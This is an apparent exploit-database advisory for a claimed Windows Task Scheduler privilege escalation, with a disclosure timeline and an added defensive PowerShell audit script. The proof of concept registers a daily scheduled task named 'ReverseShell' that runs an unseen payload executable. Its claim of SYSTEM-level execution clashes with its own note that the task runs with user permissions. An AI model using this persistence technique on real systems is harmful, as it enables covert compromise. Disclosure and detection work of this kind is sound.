Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI, and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional elevation of privilege.
# Exploit Title: Microsoft Windows Task Scheduler Privilege Escalation
# Date: 10/7/19
# Exploit Author: Social Engineering Neo
# Version: Windows 7 SP1 → Windows 10 1903
# Tested on: 7 SP1, 10 1809 & 1903
# Microsoft Windows Task Scheduler EoP Report by Social Engineering Neo.
#
# Normal Users are able to Trigger Programs at Intervals on any Account on the Host System/Domain without Proper Authorization.
# Read our in depth report @ https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_Report.txt
#Platform:
#
# Windows 7 SP1, Windows 10 (1809 & 1903), All versions in between are likely to be affected.
# Tested on the most recent security patch. (July 2019)
#Class:
#
# Improper Authorization (CWE-285).
# Remote Code Execution.
#Proof of Concept: -
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger
#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."
#CLI NOTE: - We have not put much time/effort into the script-based PoC; we encourage a skilled programmer to elaborate on this further ;)
# : - PoC will run task with "user" permissions.
# : - You obviously need your own payload and configure accordingly.
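# Defender-side check, added here and not part of the original advisory or its authors' code: it lists tasks that run with elevated principals but whose action lives in a user-writable path, and pulls recent task-creation events (Security 4698) so the creating account is visible. It assumes Windows 8 or later (ScheduledTasks module) and that object-access auditing for the Task Scheduler is enabled; the writable-path list is an assumption to adjust per host.

```powershell
# Added example: audit scheduled tasks and their creators (not from the advisory).
# Assumes Windows 8+ and that "Audit Other Object Access Events" is enabled
# so that Security event 4698 (scheduled task created) is written.
Import-Module ScheduledTasks

# Assumed set of paths a standard user can normally write to. A privileged
# task whose executable lives here can be swapped out by that user.
$userWritable = @('C:\Users\', 'C:\ProgramData\', $env:TEMP)

function Get-SuspiciousTask {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        $p = $task.Principal
        # Treat SYSTEM, administrator accounts and "Highest" run level as privileged.
        $privileged = ($p.UserId -match 'SYSTEM|Administrator') -or ($p.RunLevel -eq 'Highest')
        foreach ($action in $task.Actions) {
            $exe = $action.Execute
            if (-not $exe) { continue }
            $inUserPath = $userWritable | Where-Object { $_ -and ($exe -like "$_*") }
            if ($privileged -and $inUserPath) {
                [pscustomobject]@{
                    TaskName = $task.TaskName; Path = $task.TaskPath
                    Author   = $task.Author;   RunsAs = $p.UserId
                    RunLevel = $p.RunLevel;    Execute = $exe
                }
            }
        }
    }
}

# Event 4698 records the creating account (SubjectUserName) and the task XML,
# which is the evidence a user-registered task leaves even when the task itself
# looks unremarkable in the GUI.
function Get-RecentTaskRegistration {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time     = $_.TimeCreated
            Creator  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            TaskName = $data.TaskName
        }
    }
}

Get-SuspiciousTask | Format-Table -AutoSize
Get-RecentTaskRegistration | Format-Table -AutoSize
```

Run from an elevated session so that both the full task list and the Security log are readable; a task created by a standard user shows that user as the 4698 creator even if the task principal is a different account.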
#VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
# : - https://youtu.be/_leFNyo5wxM *original*
#Expected Result: -
#
# Normal users should not be able to run tasks as other users and execute programs on accounts without proper authorization.
#Observed Result: -
#
# Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromise.
#NOTE: - We reported this issue to Microsoft.
# : - According to Microsoft, this functionality is considered "By Design" & they have no intent to service this issue.
# : - Have a read @ https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
# : - We (Social Engineering Neo) consider this as a PoC rather than an actual exploit.
# : - Because the payload was being loaded through Task Scheduler, the user will have no knowledge that the payload is being run. (even if they checked)
#TIMELINE: - Discovery 5th July 2019
# : - Initial Report 5th July 2019
# : - Case Opened 8th July 2019
# : - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
# : - MSRC Response 9th July 2019
# : - Our Response 9th July 2019
# : - Case Closed 9th July 2019
# : - MSRC Response 9th July 2019
# : - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)
#
# : - We thank the MSRC team for their quick response.
# 0day.today [2019-12-04] #